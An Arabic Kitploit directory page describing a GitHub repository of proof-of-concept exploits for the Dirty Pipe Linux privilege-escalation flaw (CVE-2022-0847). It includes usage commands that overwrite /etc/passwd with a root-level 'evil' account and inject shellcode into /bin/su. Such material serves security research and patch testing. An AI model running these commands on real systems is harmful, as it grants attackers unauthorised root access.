Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ajith737/dirty-pipe-cve-2022-0847-pocs
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليماستغلال الملفات الثنائية
GitHubajith737/dirty-pipe-cve-2022-0847-pocs

Dirty-Pipe-CVE-2022-0847-POCs

استغلالات إثبات مفهوم لثغرة CVE-2022-0847 (Dirty Pipe) تتيح تصعيد الصلاحيات المحلية على أنوية Linux 5.8+ عن طريق الكتابة فوق الملفات للقراءة فقط أو ثنائيات SUID.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
31منذ 3 سنواتلم تتم المراجعة بعد

Dirty-Pipe-CVE-2022-0847-POCs

  • المؤلف: Max Kellermann [email protected]
  • المساهم: Bl4sty https://twitter.com/bl4sty ثغرة جديدة في لينكس تُعرف باسم 'Dirty Pipe' تسمح للمستخدمين المحليين بالحصول على صلاحيات الجذر عبر استغلالات متاحة للعموم.

اليوم، كشف الباحث الأمني Max Kellermann بشكل مسؤول عن ثغرة 'Dirty Pipe' وذكر أنها تؤثر على Linux Kernel 5.8 والإصدارات الأحدث، حتى على أجهزة أندرويد.

تُتتبع الثغرة برقم CVE-2022-0847 وتسمح لمستخدم غير مميَّز بحقن البيانات والكتابة فوقها في الملفات للقراءة فقط، بما في ذلك عمليات SUID التي تعمل بصلاحيات الجذر.

اكتشف Kellerman الثغرة بعد تعقبه خطأ كان يُفسد سجلات الوصول لخادم الويب لدى أحد عملائه.

ثم كتب Bl4sty نسخة أخرى. فبدلاً من الكتابة فوق ملف مثل /etc/passwd، تكتب فوق ملف ثنائي SUID يحدده المستخدم (مثل /bin/su)، محقنةً شيفرة shellcode تُنفَّذ بعد ذلك بصلاحيات مستخدم مميَّز (أي الجذر).

الاستغلال 1

root@kitploit:~
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1 
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'

الاستغلال 2

root@kitploit:~
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su

للاستخدام المفصل، راجع: https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf

تنزيل الأداة